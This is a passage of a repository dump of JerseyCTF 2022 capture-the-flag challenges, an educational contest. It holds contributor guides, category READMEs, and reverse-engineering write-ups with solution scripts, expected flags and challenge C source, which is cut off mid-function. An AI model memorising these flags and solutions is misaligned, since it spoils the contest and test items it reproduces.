├── .github ├── CODE_OF_CONDUCT.md └── contributing.md ├── .gitignore ├── LICENSE ├── README.md ├── bin ├── README.md ├── block-game │ ├── README.md │ └── challenge │ │ └── MyModule-0.1.0-SNAPSHOT.jar ├── context-clues │ ├── README.md │ ├── challenge │ │ └── context-clues │ ├── context-clues.c │ └── sol.py ├── going-over │ ├── README.md │ └── challenge │ │ ├── Dockerfile │ │ ├── files │ │ ├── flag.txt │ │ └── src.c │ │ ├── going-over │ │ ├── solver.py │ │ └── ynetd ├── kangaroo │ ├── README.md │ ├── challenge │ │ └── kangaroo │ ├── kangaroo-gen.tar.gz │ ├── kangaroo.c │ └── sol │ │ ├── accepts.txt │ │ ├── jumps.txt │ │ ├── perms.txt │ │ └── solution.py ├── misdirection │ ├── README.md │ └── challenge │ │ └── misdirection ├── patches │ ├── README.md │ └── challenge │ │ ├── Makefile │ │ ├── dump.txt │ │ ├── patches │ │ └── patches.c ├── symbolism │ ├── README.md │ ├── challenge │ │ └── symbolism.vbin │ └── symbolism.lisp └── win-bin-analysis │ ├── README.md │ ├── challenge │ └── winBinAnalysis.zip │ └── src.cs ├── createWriteup.py ├── crypto ├── README.md ├── audio-transmission │ └── README.md ├── file-zip-cracker │ ├── README.md │ ├── challenge │ │ ├── FileZipCracker_Challenge_Version.py │ │ ├── actorList.txt │ │ └── secret_folder.zip │ └── solution │ │ ├── FileZipCracker.py │ │ ├── actorList.txt │ │ ├── secret_folder.zip │ │ └── secret_folder │ │ ├── compressed_file.zip │ │ ├── compressed_file │ │ └── Flag.gif │ │ └── msg.txt ├── hidden-in-plain-sight │ ├── README.md │ └── challenge │ │ ├── encrypted.pco │ │ └── encryption.py ├── inDEStructible │ ├── README.md │ ├── challenge │ │ └── clearence_code │ └── solution │ │ └── pydes.py ├── new-algorithm │ └── README.md ├── salad │ └── README.md ├── secret-message │ ├── README.md │ ├── challenge │ │ ├── Photo.jpg │ │ └── secret_key.txt │ └── sol │ │ ├── Photo.jpg │ │ ├── secret_key.txt │ │ └── secret_message.txt ├── would-you-wordle │ ├── README.md │ └── challenge │ │ └── Wordle-Words.jpg └── xoracle │ ├── README.md │ └── 
challenge │ ├── Dockerfile │ ├── flag.txt │ └── xoracle.py ├── forensics ├── README.md ├── corrupted-file │ ├── README.md │ ├── challenge │ │ └── flag_mod.jpg │ └── solution │ │ └── flag.jpg ├── data-backup │ ├── README.md │ └── challenge │ │ └── data-backup ├── infected │ └── README.md ├── recent-memory │ └── README.md ├── scavenger-hunt │ ├── README.md │ └── challenge │ │ ├── Dockerfile │ │ ├── files │ │ └── folder │ │ │ └── .secret_folder │ │ │ └── flag.txt │ │ └── package │ │ ├── notaflag_1.0-1 │ │ ├── DEBIAN │ │ │ └── control │ │ └── usr │ │ │ └── share │ │ │ └── man │ │ │ └── man1 │ │ │ └── notaflag.1 │ │ └── src.c ├── speedy-at-midi │ ├── README.md │ └── challenge │ │ ├── riff.mid │ │ └── riff.mp3 └── stolen-data │ ├── README.md │ └── challenge │ └── stolen_data.pcap ├── makeChallenge.py ├── misc ├── README.md ├── bank-clients │ ├── README.md │ └── challenge │ │ └── clients.kdbx ├── check-the-shadows │ ├── README.md │ └── challenge │ │ └── shadow ├── dnsmasq-ip-extract │ ├── README.md │ ├── challenge │ │ └── dnsmasq-ip-extract-dnsmasq.log │ └── sol │ │ ├── dnsmasq-ip-extract-answer-list.txt │ │ ├── dnsmasq-ip-extract-challenge-generator.py │ │ ├── dnsmasq-ip-extract-flag.txt │ │ └── solution_scripts │ │ ├── dnsmasq-ip-extract-solution.ps1 │ │ └── dnsmasq-ip-extract-solution.py ├── filtered-feeders │ ├── README.md │ └── challenge │ │ └── herrings.png ├── firewall-rules │ ├── README.md │ └── challenge │ │ └── firewall rules.xlsx ├── root-me │ ├── README.md │ └── challenge │ │ ├── Dockerfile │ │ └── flag.txt ├── snort-log │ ├── README.md │ └── challenge │ │ └── snort.log └── we-will │ ├── README.md │ └── challenge │ └── flag.zip ├── osint ├── README.md ├── contributor │ ├── README.md │ └── other │ │ ├── forgot_password.php │ │ ├── headshot.png │ │ └── index.php ├── dns-joke │ └── README.md ├── mystery │ ├── README.md │ └── challenge │ │ └── mystery.JPG ├── photo-op-spot │ ├── README.md │ └── challenge │ │ └── photo-op-spot.JPG ├── rarity │ ├── README.md │ └── 
challenge │ │ └── picture.png └── sho-me-whats-wrong │ └── README.md ├── sponker └── README.md ├── web ├── README.md ├── apache-logs │ ├── README.md │ └── challenge │ │ └── webtraffic.log ├── buster │ ├── README.md │ └── challenge │ │ └── buster.py ├── cookie-factory │ ├── README.md │ └── challenge │ │ ├── .dockerignore │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── requirements.txt │ │ ├── static │ │ └── cookie.png │ │ └── templates │ │ ├── base.html │ │ ├── dashboard.html │ │ ├── error.html │ │ ├── index.html │ │ └── login.html ├── flag-vault │ ├── README.md │ └── challenge │ │ ├── .dockerignore │ │ ├── Dockerfile │ │ ├── app.py │ │ ├── requirements.txt │ │ ├── static │ │ └── flag.png │ │ └── templates │ │ ├── base.html │ │ ├── error.html │ │ ├── flags.html │ │ ├── index.html │ │ └── login.html ├── heres-my-password │ ├── README.md │ ├── challenge │ │ └── users.txt │ ├── forgot_password.php │ └── index.php ├── road-not-taken │ ├── README.md │ └── challenge │ │ ├── Dockerfile │ │ ├── flag.txt │ │ ├── httpd.conf │ │ ├── index.html │ │ └── jerseyctfiilogowithtext.png └── seigwards-secrets │ ├── README.md │ └── challenge │ ├── index.html │ └── login.js └── writeups ├── README.md ├── apache-logs └── .keep ├── audio-transmission └── .keep ├── bank-clients └── .keep ├── block-game └── .keep ├── buster └── .keep ├── check-the-shadows └── .keep ├── context-clues └── .keep ├── contributor └── .keep ├── cookie-factory └── .keep ├── corrupted-file └── .keep ├── data-backup └── .keep ├── dns-joke └── .keep ├── dnsmasq-ip-extract └── .keep ├── file-zip-cracker └── .keep ├── filtered-feeders └── .keep ├── firewall-rules └── .keep ├── flag-vault └── .keep ├── going_over └── .keep ├── heres-my-password └── .keep ├── hidden-in-plain-sight └── .keep ├── inDEStructible └── .keep ├── infected └── .keep ├── kangaroo └── .keep ├── misdirection └── .keep ├── mystery └── .keep ├── new-algorithm └── .keep ├── patches └── .keep ├── photo-op-spot └── .keep ├── rarity └── .keep ├── recent-memory 
└── .keep ├── road-not-taken └── .keep ├── root-me └── .keep ├── salad └── .keep ├── scavenger-hunt └── .keep ├── secret-message └── .keep ├── seigwards-secrets └── .keep ├── sho-me-whats-wrong └── .keep ├── snort-log └── .keep ├── speedy-at-midi └── .keep ├── stolen-data └── .keep ├── symbolism └── .keep ├── we-will └── .keep ├── win-bin-analysis └── .keep ├── would-you-wordle └── .keep └── xoracle └── .keep /.github/CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in our 6 | community a harassment-free experience for everyone, regardless of age, body 7 | size, visible or invisible disability, ethnicity, sex characteristics, gender 8 | identity and expression, level of experience, education, socio-economic status, 9 | nationality, personal appearance, race, religion, or sexual identity 10 | and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 
14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 
55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at 63 | acm@njit.edu. 64 | All complaints will be reviewed and investigated promptly and fairly. 65 | 66 | All community leaders are obligated to respect the privacy and security of the 67 | reporter of any incident. 68 | 69 | ## Enforcement Guidelines 70 | 71 | Community leaders will follow these Community Impact Guidelines in determining 72 | the consequences for any action they deem in violation of this Code of Conduct: 73 | 74 | ### 1. Correction 75 | 76 | **Community Impact**: Use of inappropriate language or other behavior deemed 77 | unprofessional or unwelcome in the community. 78 | 79 | **Consequence**: A private, written warning from community leaders, providing 80 | clarity around the nature of the violation and an explanation of why the 81 | behavior was inappropriate. A public apology may be requested. 82 | 83 | ### 2. Warning 84 | 85 | **Community Impact**: A violation through a single incident or series 86 | of actions. 87 | 88 | **Consequence**: A warning with consequences for continued behavior. No 89 | interaction with the people involved, including unsolicited interaction with 90 | those enforcing the Code of Conduct, for a specified period of time. This 91 | includes avoiding interactions in community spaces as well as external channels 92 | like social media. Violating these terms may lead to a temporary or 93 | permanent ban. 94 | 95 | ### 3. Temporary Ban 96 | 97 | **Community Impact**: A serious violation of community standards, including 98 | sustained inappropriate behavior. 
99 | 100 | **Consequence**: A temporary ban from any sort of interaction or public 101 | communication with the community for a specified period of time. No public or 102 | private interaction with the people involved, including unsolicited interaction 103 | with those enforcing the Code of Conduct, is allowed during this period. 104 | Violating these terms may lead to a permanent ban. 105 | 106 | ### 4. Permanent Ban 107 | 108 | **Community Impact**: Demonstrating a pattern of violation of community 109 | standards, including sustained inappropriate behavior, harassment of an 110 | individual, or aggression toward or disparagement of classes of individuals. 111 | 112 | **Consequence**: A permanent ban from any sort of public interaction within 113 | the community. 114 | 115 | ## Attribution 116 | 117 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], 118 | version 2.0, available at 119 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. 120 | 121 | Community Impact Guidelines were inspired by [Mozilla's code of conduct 122 | enforcement ladder](https://github.com/mozilla/diversity). 123 | 124 | [homepage]: https://www.contributor-covenant.org 125 | 126 | For answers to common questions about this code of conduct, see the FAQ at 127 | https://www.contributor-covenant.org/faq. Translations are available at 128 | https://www.contributor-covenant.org/translations. 129 | -------------------------------------------------------------------------------- /.github/contributing.md: -------------------------------------------------------------------------------- 1 | # Contributing 2 | 3 | * Your one stop shop for contributing! 4 | 5 | --- 6 | ## How to Contribute 7 | 8 | ### Creating a challenge 9 | * **Be sure your flag looks like `jctf{your_text_here}`** 10 | 11 | 1. 
Go to the directory of the category that you wish to create a challenge for 12 | 13 | | Categories 14 | | :-- 15 | | [crypto](../crypto) 16 | | [forensics](../forensics) 17 | | [misc](../misc) 18 | | [bin](../bin) 19 | | [web](../web) 20 | | [osint](../osint) 21 | 22 | 1. Run `python3 ../makeChallenge.py <ChallengeName>` and it will automatically set up everything the standardization requires for a challenge. 23 | - _NB: This assumes you have followed Step 1_ 24 | * Be sure that ChallengeName is `one word` (has no space) or `encapsulated by single quotes` 25 | * Feel free to add new files or folders that aren't part of the standardization process 26 | * _Try not to deviate, unless necessary_ 27 | 28 | 1. Once you finish, **remember to append that challenge to the README.md in that category directory, based on difficulty** 29 | 30 | | README.md's Categories 31 | | :-- 32 | | [crypto/README.md](../crypto/README.md) 33 | | [forensics/README.md](../forensics/README.md) 34 | | [misc/README.md](../misc/README.md) 35 | | [bin/README.md](../bin/README.md) 36 | | [web/README.md](../web/README.md) 37 | | [osint/README.md](../osint/README.md) 38 | 39 | --- 40 | ### Creating a writeup for a challenge 41 | * *Helping both Beginners and More Seasoned Github Users* 42 | 43 | #### For Github Beginners 44 | 1. **Fork** github repository 45 | ![](https://assets.digitalocean.com/articles/eng_python/PullRequest/GitHub_Repo.gif) 46 | 1. _**(In a terminal)**_ **Clone** forked repository and move to cloned Directory 47 | * `git clone https://github.com/<your-username>/ctf-challenges.git` 48 | * `cd ctf-challenges` 49 | 1. **Create** and **Switch** to new branch 50 | * `git checkout -b <branch-name>` 51 | * Preferably `<branch-name>` is the name of the challenge(s) 52 | 1. Change directory into writeups and then into the challenge that you have / want to make a write-up for 53 | * `cd writeups/<ChallengeName>` 54 | 1. 
Run `python3 ../../createWriteup.py ` 55 | * This will create a structure that looks like this: 56 | ```txt 57 | +--- 58 | | \--- 59 | | \--- 60 | | +--- README.md 61 | ``` 62 | 1. Put all custom files / scripts that helped answer the problem in the `` directory. Basically anything necessary goes in solution 63 | 1. Document your method in the `README.md` file which is located in the `/` directory 64 | 1. Change Directory until you are at `ctf-challenges/writeups` 65 | 1. Git Add Files 66 | * `git add .` 67 | 1. Git Commit 68 | * `git commit -m "<commit message>"` 69 | 1. Git Push 70 | * `git push origin <branch-name>` 71 | 1. With everything pushed onto Github, [follow this last tutorial](https://docs.github.com/en/github/collaborating-with-issues-and-pull-requests/creating-a-pull-request) and you should be on your way! 72 | 73 | --- 74 | 75 | ### For More Experienced Github Frequenters 76 | 1. Create a fork of Github repo, and 77 | 1. Change directory into `writeups/<ChallengeName>`, with `<ChallengeName>` being the challenge the writeup is written for 78 | 1. Run `python3 ../../createWriteup.py ` 79 | * This will standardize the writeups in the repository 80 | 1. Dump any scripts/file in `` directory located in `writeups///` and describe Method in `writeups///README.md` 81 | 1. Create a PR Request from 82 | * _Note_: Organizers may request edits on your PR 83 | 1. 
Wait and Drink Campagne during the Code Review process (if you are of the legal age) 84 | * _Note_: Will probably only check if the proper steps have been taken to create the writeup 85 | 86 | 87 | ## DM / PM any of the organizers to help with the writeup process 88 | 89 | --- 90 | ## Resources 91 | * [Markdown Cheatsheet](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet) 92 | * [DigitalOcean - How to create a Pull Request](https://www.digitalocean.com/community/tutorials/how-to-create-a-pull-request-on-github) 93 | * [Github Docs - Creating a Pull Request](https://docs.github.com/en/github/collaborating-with-issues-and-pull-requests/creating-a-pull-request) 94 | * [Generate ASCII Tree Structures](https://cmatskas.com/generate-ascii-folder-structures-for-windows-with-tree/) 95 | 96 | --- 97 | ## Last Resort 98 | Contact `Logan R#7154` or `AndersOrve#9714` on Discord if clarification or help is needed 99 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Object files 5 | *.o 6 | *.ko 7 | *.obj 8 | *.elf 9 | 10 | # Linker output 11 | *.ilk 12 | *.map 13 | *.exp 14 | 15 | # Precompiled Headers 16 | *.gch 17 | *.pch 18 | 19 | # Libraries 20 | *.lib 21 | *.a 22 | *.la 23 | *.lo 24 | 25 | # Shared objects (inc. 
Windows DLLs) 26 | *.dll 27 | *.so 28 | *.so.* 29 | *.dylib 30 | 31 | # Executables 32 | *.exe 33 | *.out 34 | *.app 35 | *.i*86 36 | *.x86_64 37 | *.hex 38 | 39 | # Debug files 40 | *.dSYM/ 41 | *.su 42 | *.idb 43 | *.pdb 44 | 45 | # Kernel Module Compile Results 46 | *.mod* 47 | *.cmd 48 | .tmp_versions/ 49 | modules.order 50 | Module.symvers 51 | Mkfile.old 52 | dkms.conf 53 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 NJIT ACM 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # jerseyctf-2022-challenges 2 | 3 | Development of Challenges for JerseyCTF 2022, hosted by [NJIT ACM](https://njit.acm.org) / [NJIT SCI](https://sci.njit.edu) and co-sponsored by [NJCCIC](https://www.cyber.nj.gov). 4 | 5 |

6 | 7 | --- 8 | 9 | ## General Info 10 | 11 | ### Challenges 12 | | Categories | Description 13 | | :----: | :-----: 14 | | [crypto](crypto) | Cryptography 15 | | [forensics](forensics) | Forensics 16 | | [bin](bin) | Reversing, binary exploitation 17 | | [web](web) | All types of web exploitation 18 | | [osint](osint) | Open-source intelligence 19 | | [misc](misc) | "Potpourri", any challenges! 20 | 21 | --- 22 | 23 | ## Interested in Contributing Challenges or Writeups? 24 | * Check out [contributing.md](.github/contributing.md) 25 | 26 | --- 27 | 28 | ## Additional Resources 29 | * [Tech Talk Playlist](https://youtube.com/playlist?list=PLrcTWWy-esnCuaiEMSj6Bst4phnq-Qg6B) 30 | * [Information and Registration Site](https://jerseyctf.com) 31 | * [2021 GitHub Repository](https://github.com/njitacm/jerseyctf-2021-challenges) 32 | 33 | --- 34 | 35 | ## Promotional Poster and Schedule 36 | 37 |

38 |

39 | 40 | 41 | -------------------------------------------------------------------------------- /bin/README.md: -------------------------------------------------------------------------------- 1 | # BIN 2 | 3 | - BIN --> Binary Exploitation + Reversing 4 | 5 | ## Easy Challenges 6 | | Challenge Name | Description | Hint 7 | |:-- | :-- | :--- 8 | | [patches](patches) | Given an objdump of an executable, figure out what hexadecimal instructions are needed to nop to get the jctf flag to stdout | The [Intel Manual](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf) might be overkill, but maybe reviewing Intel assembly instructions and their corresponding opcodes might help to crack the challenge. **Simply enter the opcodes** 9 | | [misdirection](misdirection) | Where'd the flag go? | There are many ways to solve this challenge, some of which are much easier than others. 10 | | [win-bin-analysis](win-bin-analysis) | Find the key hidden in the Windows executable files. | .exe's aren't the only type of executable file. 11 | 12 | ## Medium Challenges 13 | | Challenge Name | Description | Hint 14 | |:-- | :-- | :--- 15 | | [context-clues](context-clues) | Everyone made a big deal about C++ getting coroutines in 2020, but C has had them for decades if you know where to look. | Remember to look up terms and function names you've never heard of. 16 | | [block-game](block-game) | There's mining, and there's crafting, but something seems off... | This doesn't look like a standalone program, I wonder if it depends on something else to run. 17 | | [going-over](going-over) | My friends said they were going on a trip but I think they ran into some trouble... nc 0.cloud.chals.io 10197. They sent me these two files before we lost contact ([src.c](challenge/files/src.c) and [going-over](challenge/going-over)) | If only there were a way to find the exact location of the ledge... 
like if the ledge had an address or something 18 | 19 | ## Hard Challenges 20 | | Challenge Name | Description | Hint 21 | |:-- | :-- | :--- 22 | | [symbolism](symbolism) | My friend sent me this weird file. Whenever I ask him what it is, he just keeps saying something about symbols. | https://archives.loomcom.com/genera/genera-install.html 23 | | [kangaroo](kangaroo) | I'm feeling pretty JUMPY today. Can you give me a nice flag to JUMP on? | There's a lot of code, but most of it seems pretty similar. Try to look at the bigger picture. 24 | -------------------------------------------------------------------------------- /bin/block-game/README.md: -------------------------------------------------------------------------------- 1 | # block-game 2 | 3 | ## Challenge Text 4 | * There's mining, and there's crafting, but something seems off... 5 | 6 | ## Hint 7 | * This doesn't look like a standalone program, I wonder if it depends on something else to run... 8 | * If you're getting a command not found error, try building the game from source 9 | 10 | ## Solution 11 | 12 | Reverse engineering challenge with a module for the game Terasology 13 | 14 | JAR files are just `.zip` files with a different extension; there are various ways to view the contents (without decompiling): 15 | 16 | * Use the `jar` command line tool to extract it 17 | * Rename the file and use `unzip` or a similar tool 18 | * Use a GUI tool like 7zip 19 | * Use Vim or Neovim to explore the archive without extracting it 20 | 21 | Then you can also decompile it to see the source code; note that the JAR also contains assets that aren't code, so both of these steps are important. 22 | I usually decompile JAR files by googling "java decompiler online" or something similar and clicking on one of the first results; 23 | there are command line tools like `jadx` that work too (and are probably faster if you have them installed). 
24 | Java class files retain quite a bit of information, so the result is pretty readable. 25 | 26 | In any case, you should be able to notice the string "terasology" in several places; 27 | if you look this up, you'll find that it's an open source game similar to Minecraft. 28 | The JAR file is a Terasology "module"; similar to a mod, but using an official API for extending the game. 29 | 30 | Figuring out what's going on takes a little bit of research into how Terasology works; 31 | at a high level, the module creates 5 types of entities and a command called `printFlag` for the in-game console. 32 | The command sends an event to all entities of the first type with some data; 33 | then this entity transforms it a little bit and sends it to the next one through another event, 34 | all the way to the last one which prints the result (the flag) to the in-game console. 35 | As long as there's at least one entity of each type in the world, this results in the flag being printed out when the command is run. 36 | (If one entity is missing, there's no one to receive one of the events in the chain and the data doesn't make it to the end.) 37 | There's also some other indirection to throw you off, like duplicate events being sent to entities that don't have handlers for them, 38 | and the fact that the names of all of the classes and entities are just random words. 39 | 40 | From here, we can get the flag either statically or dynamically: 41 | 42 | ### Static 43 | 44 | The transformations at each stage are fairly simple, so we can just write a short script to generate the flag ourselves. 
45 | Here's a Python script: 46 | 47 | ```py 48 | # Starting values from RedSystem.DATA 49 | buf = [104, 65, 111, -41, 119, -19, -59, 19, 118, 102, 92, -35, 70, -92, -49, -33, 61, -74, -17, -90, -128, 31, -86, -94, 67, -55, 16, -67, 91, -113, 63, 41, 81, 49, -75, 103, 79] 50 | # Java only supports signed bytes; we can use this trick to make sure Python's binary representation is the same as Java's 51 | buf = [x & 0xFF for x in buf] 52 | 53 | # BlueSystem.DATA 54 | blue = [-70, 74, -118, -9, 37, 105, 69, -119, 103, -88, 91, 19, -58, -58, -19, -16, 100, 65, 42, 79, 27, -45, -125, -38, 119, 8, -121, -8, 67, 71, -2, 62, -34, 93, 0, -116, 54] 55 | # Same trick as before 56 | blue = [x & 0xFF for x in blue] 57 | 58 | # OrangeSystem.onCrystal 59 | for i in range(len(buf)): 60 | buf[i] = (~buf[i]) & 0xFF 61 | 62 | # YellowSystem.onGracious 63 | for i in range(len(buf)): 64 | buf[i] ^= 0x47 65 | 66 | # GreenSystem.onCruel 67 | for i in range(1, len(buf)): 68 | buf[i] ^= buf[i-1] 69 | 70 | # BlueSystem.onPrecious 71 | for i in range(len(buf)): 72 | buf[i] ^= blue[i] 73 | 74 | # PurpleSystem.onGraceful 75 | flag = bytes(buf) 76 | print(flag) 77 | ``` 78 | 79 | This approach has the advantage that it doesn't require downloading/setting up the game, but it also requires more precise reverse engineering. 80 | 81 | ### Dynamic 82 | 83 | You can download the game by cloning the [official Github repository](https://github.com/MovingBlocks/Terasology). 84 | You need to have Java 11 or newer installed to run the game. 85 | Then, in the game directory, you can run `./groovyw module recurse CoreSampleGameplay` to install the CoreSampleGameplay gameplay template 86 | (you need at least one to create a world, since *all* of Terasology's content is implemented through modules). 
87 | Then you can copy the provided JAR file into the `modules` folder, start the game with `./gradlew jar game`, 88 | and create a new world with `My Module` selected on the Advanced page of the world creation dialog. 89 | 90 | When the world loads, you can press `F1` or grave to open the in-game console. 91 | Use the `spawnPrefab` command to spawn one of each entity (`AridEntity`, `ArcticEntity`, `BleakEntity`, `CanineEntity`, and `EarlyEntity`). 92 | Finally, you can run the `printFlag` command to get the flag. 93 | 94 | This approach has the advantage that you don't need to do as much reverse engineering, but figuring out how to set up the game might be a bit of a hassle. 95 | 96 | Flag: `jctf{b3Tter_th4N_tH3_0r1giN4l_a093c0}` 97 | 98 | ## Credit 99 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 100 | 101 | -------------------------------------------------------------------------------- /bin/block-game/challenge/MyModule-0.1.0-SNAPSHOT.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/block-game/challenge/MyModule-0.1.0-SNAPSHOT.jar -------------------------------------------------------------------------------- /bin/context-clues/README.md: -------------------------------------------------------------------------------- 1 | # context-clues 2 | 3 | ## Challenge Text 4 | * Everyone made a big deal about C++ getting coroutines in 2020, but C has had them for decades if you know where to look. 5 | 6 | ## Hint 7 | * Remember to look up terms and function names you've never heard of. 8 | 9 | ## Solution 10 | 11 | Reversing challenge using POSIX `makecontext`/`getcontext`/`swapcontext` functions 12 | 13 | Most of the solution entails knowing what these library functions do; from there, it's pretty simple to figure out what the program is doing. 
14 | `main` calls `func1` using its context, then `func1` passes control back and forth to `func2` a few times before they return. 15 | Each function performs some transformations on the input buffer, 16 | but tracing these transformations gets complicated because control gets passed back and forth in the middle of loops. 17 | After the transformations, `main` checks if the buffer is equal to some expected value. 18 | 19 | We could try to trace these transformations to work backwards from the expected value and get the original, but there's also a more clever approach. 20 | Using Z3, we can make an array of symbolic bit vectors (one per input character), then simulate the transformations on that array, and add the constraint that the result must be equal to the expected value. 21 | Then, the solver should tell us the original input, which should be the flag. 22 | We can simulate the context switches using Python's implementation of coroutines (generators). 23 | To do this, we make one function a generator, and use `next` to pass control to that function, and `yield` to pass control back. 24 | The syntax looks a little bit strange because this isn't really what generators are intended to be used for, but it's effectively equivalent to what the binary does. 25 | See [sol.py](sol.py) for an implementation of this solution. 26 | 27 | * Flag: `jctf{0b5OL3sc3nCe_rU1e5_209g9ax}` 28 | 29 | ## Credit 30 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 
31 | -------------------------------------------------------------------------------- /bin/context-clues/challenge/context-clues: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/context-clues/challenge/context-clues -------------------------------------------------------------------------------- /bin/context-clues/context-clues.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | static volatile char inp[32]; 7 | static const char expected[32] = 8 | {0x6a, 0x63, 0x39, 0x30, 0x2e, 0x2b, 0x34, 0x4e, 0x4c, 0x1b, 0x4f, 0x2d, 0x5b, 0xb, 0x79, 0x1c, 0x20, 0x7b, 0xa, 0x6b, 0x4f, 0x20, 0x11, 0x72, 0x70, 0x23, 0x63, 0x77, 0x18, 0x3a, 0x6a, 0x5e}; 9 | static ucontext_t ctx1, ctx2, ctx_main; 10 | 11 | static char stack1[SIGSTKSZ], stack2[SIGSTKSZ]; 12 | 13 | #define SWP(i1, i2) { \ 14 | int tmp = inp[i1]; \ 15 | inp[i1] = inp[i2]; \ 16 | inp[i2] = tmp; \ 17 | } 18 | 19 | void func1() { 20 | for (int i = 6; i < 28; i++) { 21 | inp[i] ^= 0x37; 22 | if (i == 16) { 23 | swapcontext(&ctx1, &ctx2); 24 | } 25 | } 26 | 27 | SWP(24, 5) 28 | 29 | for (int i = 3; i < 22; i++) { 30 | inp[i] ^= inp[i-1]; 31 | if (i == 7) { 32 | swapcontext(&ctx1, &ctx2); 33 | } 34 | } 35 | 36 | SWP(9, 6) 37 | 38 | for (int i = 13; i < 30; i++) { 39 | SWP(12, i) 40 | if (i == 21) { 41 | swapcontext(&ctx1, &ctx2); 42 | } 43 | } 44 | 45 | SWP(15, 27) 46 | } 47 | 48 | void func2() { 49 | for (int i = 3; i < 29; i++) { 50 | SWP(2, i) 51 | if (i == 11) { 52 | swapcontext(&ctx2, &ctx1); 53 | } 54 | } 55 | 56 | SWP(20, 11) 57 | 58 | for (int i = 12; i < 32; i++) { 59 | inp[i] ^= inp[i-1]; 60 | if (i == 20) { 61 | swapcontext(&ctx2, &ctx1); 62 | } 63 | } 64 | 65 | SWP(27, 30) 66 | 67 | for (int i = 4; i < 18; i++) { 68 | inp[i] ^= 0x78; 69 | if (i == 14) { 70 | swapcontext(&ctx2, 
